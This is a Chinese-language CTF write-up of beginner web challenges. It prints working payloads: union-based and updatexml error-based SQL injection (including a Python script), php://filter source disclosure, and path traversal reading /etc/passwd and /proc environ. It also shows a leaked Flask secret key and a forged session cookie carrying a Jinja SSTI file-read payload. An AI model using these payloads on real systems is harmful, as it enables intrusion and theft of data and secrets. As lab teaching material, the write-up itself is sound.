C
C
CTF-WriteUp
Search
⌃K

WEB入门

举足轻重的信息收集

常见的收集

  • robots.txt
  • index.php~
  • .index.php.swp

粗心的小李

scrabble

CTF中的SQL注入

SQL注入-1

id=3提示加入参数tips=1,输出查询语句:
select * from notes where id ='3'
测试了一下,完全没有WAF,应该是联合查询,尝试联合查询:
id=-1%27union%20select%201,2,3%23&tips=1
注意这里只能用%23,不能用#,否则无法正常值注入,因为在提交的时候,#并没有通过url编码进行转义。
看到回显是23,接下来注入就比较简单了。
-1%27%20union%20select%201,(select%20group_concat(distinct%20TABLE_SCHEMA)%20from%20information_schema.tables),3%23
查表:
-1%27%20union%20select%201,(select%20group_concat(distinct%20TABLE_NAME)%20from%20information_schema.tables%20where%20table_schema%3d'note'),3%23
读字段:
-1%27%20union%20select%201,(select%20group_concat(distinct%20COLUMN_NAME)%20from%20information_schema.columns%20where%20table_schema%3d'note'%20and%20table_name%3d'fl4g'),3%23
读字段内容:
-1%27%20union%20select%201,(select%20*%20from%20note.fl4g),3%23

SQL注入-2

脚本:
import requests
url = "http://ef016835-6405-4397-b459-3b902127f1ed.node3.buuoj.cn/login.php?tips=1"
# p = 'SELECT database()'
# p = "SELECT(group_concat(table_name))FROM(information_schema.tables)WHERE(table_schema)LIKE('note')"
# p = "SELECT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name)LIKE('fl4g')"
p = "SELECT(flag)FROM(note.fl4g)"
admin = "admin' and updatexml(1,concat(0x7e,({}),0x7e),1);#".format(p)
payload = {'name': admin, 'pass': '1'}
files = []
headers = {}
response = requests.request("POST", url, headers=headers, data=payload, files=files)
print(response.text)
后续更新:这部分的正解应该是时间盲注。

任意文件读取漏洞

afr_1

本来以为是关键词过滤,后来才发现是文件有die函数,直接用filter文件流读取。
?p=php://filter/read=convert.base64-encode/resource=flag

afr_2

nginx 文件配置错误,访问/img../穿越目录获得flag。

afr_3

尝试插入..报错
[Errno 2] No such file or directory: '/home/nu11111111l/articles/article../'
穿越目录
/article?name=../../../etc/passwd
这里用到了Linux下的proc文件系统,即/proc,每个进程以数字命名,其中environ文件存储环境变量。
读文件:
/article?name=../../../proc/1/environ
查看/proc/self/cmdline:
/proc/$pid/ 可以获取指定进程的信息,但是如果某个进程想获取到自身的信息且不知道$pid时,可以通过访问/proc/self来查看文件,此时等价于/proc/$pid。
/article?name=../../../proc/self/cmdline
得到回显;
python server.py
查看server.py:
/article?name=../../../proc/self/cwd/server.py
可以看见是flask模板,且调用了flag.py以及key.py。
server.py:
import os
from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string )
from flask_session import Session
app = Flask(__name__)
execfile('flag.py')
execfile('key.py')
FLAG = flag
app.secret_key = key
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
if request.method != "POST":
return redirect(url_for("index"))
n1code = request.form.get("n1code") or None
if n1code is not None:
n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
if "n1code" not in session or session['n1code'] is None:
session['n1code'] = n1code
template = None
if session['n1code'] is not None:
template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
session['n1code'] = None
return render_template_string(template)
@app.route("/", methods=["GET"])
def index():
return render_template("main.html")
@app.route('/article', methods=['GET'])
def article():
error = 0
if 'name' in request.args:
page = request.args.get('name')
else:
page = 'article'
if page.find('flag')>=0:
page = 'notallowed.txt'
try:
template = open('/home/nu11111111l/articles/{}'.format(page)).read()
except Exception as e:
template = e
return render_template('article.html', template=template)
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=False)
其中这server.py部分代码存在SSTI cookie 注入。
if session['n1code'] is not None:
template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
session['n1code'] = None
读取flag.py时发现提示没有权限,有两种可能:过滤关键词或者是没有权限。测试了一下其他包含flag关键词的字段发现都没有权限,应该是存在关键词过滤(后来发现傻逼了,源码给了)。
key.py:
#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'
查看 Cookie Session:
于是使用payload,尝试读取flag.py:
python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__mro__[1].__subclasses__()[40]('/flag.py').read()}}'}" -s 'Drmhze6EPcv0fN_81Bj-nA'
报了语法错误的报错,于是尝试转义:
python3 flask_session_cookie_manager3.py encode -t "{'n1code':'{{[].__class__.__mro__[1].__subclasses__()[40](\'flag.py\').read()}}'}" -s 'Drmhze6EPcv0fN_81Bj-nA'
eyJuMWNvZGUiOiJ7e1tdLl9fY2xhc3NfXy5fX21yb19fWzFdLl9fc3ViY2xhc3Nlc19fKClbNDBdKCdmbGFnLnB5JykucmVhZCgpfX0ifQ.X9D_Zw.w_83uqm3Mo7WIsTlt7QFPqtmffA